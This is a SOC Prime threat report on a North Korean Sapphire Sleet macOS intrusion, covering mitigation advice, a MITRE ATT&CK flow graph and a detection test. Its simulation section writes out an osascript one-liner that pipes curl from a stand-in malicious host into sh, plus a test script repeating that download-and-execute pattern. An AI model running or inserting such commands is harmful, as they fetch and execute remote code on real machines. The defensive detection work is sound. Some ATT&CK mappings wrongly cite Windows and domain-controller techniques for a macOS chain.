Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise

SOC Prime Team

Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Microsoft Threat Intelligence has reported a macOS-focused campaign attributed to the North Korean state-sponsored actor Sapphire Sleet. The operation relies on social engineering to persuade targets to run malicious AppleScript files presented as a legitimate Zoom SDK update. Once executed, the script retrieves additional payloads through curl and osascript, expanding the intrusion in multiple stages. The malware is designed to steal credentials, cryptocurrency wallet data, and other sensitive information while also bypassing native macOS security protections to remain active on compromised systems.

Investigation

The investigation outlines a multi-stage infection chain that begins with a .scpt lure file and continues through a sequence of curl-to-osascript payload downloads. Researchers identified several backdoor components, including com.apple.cli, a services binary, icloudz, and com.google.chromes.updaters. The threat actors were also observed tampering with the macOS TCC database to obtain AppleEvents permissions, using reflective code loading techniques, and establishing persistence through a launch daemon. Exfiltration activity relied on custom user-agent strings and communications through the Telegram Bot API.

Mitigation

Apple has already released Safe Browsing and XProtect updates to disrupt the campaign’s infrastructure and malware components. Microsoft recommends blocking execution of .scpt files, restricting unsafe curl pipelines, monitoring for unauthorized TCC database changes, and auditing launch daemon installations for suspicious entries. Users should also be warned about unsolicited software update prompts and advised not to provide credentials through unexpected dialogs or scripts.

Response

Defenders should detect malicious AppleScript execution, abnormal curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Technique nodes tech_user_execution["Technique – T1204.002 User Execution: Malicious File Description: Victims are tricked into running a malicious file that initiates the intrusion."] class tech_user_execution technique tech_trusted_dev_proxy["Technique – T1127 Trusted Developer Utilities Proxy Execution Description: Legitimate developer tools are used as proxies to execute malicious payloads, bypassing security controls."] class tech_trusted_dev_proxy technique tech_subvert_trust["Technique – T1553 Subvert Trust Controls Description: Adversaries manipulate trusted relationships or configurations to gain elevated privileges or execute code."] class tech_subvert_trust technique tech_launch_daemon["Technique – T1543.004 Create or Modify System Process: Launch Daemon Description: A new daemon or system service is created or an existing one modified to achieve persistence."] class tech_launch_daemon technique tech_alt_auth_material["Technique – T1550 Use Alternate Authentication Material Description: Stolen or forged credentials, tokens, or certificates are used to authenticate as a legitimate user."] class tech_alt_auth_material technique tech_archive_lib["Technique – T1560.002 Archive Collected Data: Archive via Library Description: Collected data is compressed using a software library before exfiltration."] class tech_archive_lib technique tech_exfil_alt_proto["Technique – T1048 Exfiltration Over Alternative Protocol Description: Data is exfiltrated using nonu2011standard protocols such as DNS, FTP, or custom ports to avoid detection."] class tech_exfil_alt_proto technique tech_dynamic_resolution["Technique – T1568 Dynamic Resolution Description: The adversary resolves commandu2011andu2011control infrastructure or resources at runtime, often via DNS or other lookups."] class tech_dynamic_resolution technique tech_reflective_loading["Technique – T1620 Reflective Code Loading Description: Malicious code is loaded directly into memory without touching disk, evading traditional defenses."] class tech_reflective_loading technique tech_system_binary_proxy["Technique – T1218.003 System Binary Proxy Execution Description: Trusted system binaries are hijacked to launch malicious payloads, leveraging builtu2011in Windows utilities."] class tech_system_binary_proxy technique tech_modify_auth_process["Technique – T1556.001 Modify Authentication Process: Domain Controller Authentication Description: Authentication mechanisms on a domain controller are altered to accept forged credentials or tokens."] class tech_modify_auth_process technique %% Connections showing attack flow tech_user_execution –>|leads_to| tech_trusted_dev_proxy tech_trusted_dev_proxy –>|enables| tech_subvert_trust tech_subvert_trust –>|creates| tech_launch_daemon tech_launch_daemon –>|uses| tech_alt_auth_material tech_alt_auth_material –>|prepares| tech_archive_lib tech_archive_lib –>|triggers| tech_exfil_alt_proto tech_exfil_alt_proto –>|facilitates| tech_dynamic_resolution tech_subvert_trust –>|employs| tech_reflective_loading tech_reflective_loading –>|updates| tech_launch_daemon tech_trusted_dev_proxy –>|leverages| tech_system_binary_proxy tech_system_binary_proxy –>|leads_to| tech_subvert_trust tech_alt_auth_material –>|supports| tech_modify_auth_process tech_modify_auth_process –>|continues| tech_exfil_alt_proto "

Attack Flow

Attack Narrative & Commands:
An adversary has obtained a malicious PowerShell‑style script hosted on a remote server. To avoid creating a standalone binary, they leverage the native AppleScript interpreter (osascript) and pipe a curl download directly into the interpreter, achieving a “download‑and‑execute” in one command. This matches the rule’s osascript + curl pattern.
```
# Malicious one‑liner that should trigger the rule
osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'
```
The command line contains both osascript and curl, so the Sigma rule’s condition (selection_osascript and selection_curl) evaluates to true.

Regression Test Script:

# simulate_osascript_curl.sh
# Purpose: Reproduce the exact telemetry that should fire the detection rule.
set -e

# Define a harmless payload for safety (echo instead of actual malicious code)
MALICIOUS_URL="https://example.com/benign_payload.sh"

# Create a dummy benign payload that just prints a message.
# In a real red‑team test you would host a real script; here we keep it safe.
curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true

# Execute the AppleScript with curl piped into a shell command.
osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""

Cleanup Commands:

# cleanup_osascript_curl.sh
# Remove any temporary files and terminate stray processes.
rm -f /tmp/benign_payload.sh
pkill -f "osascript -e"

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free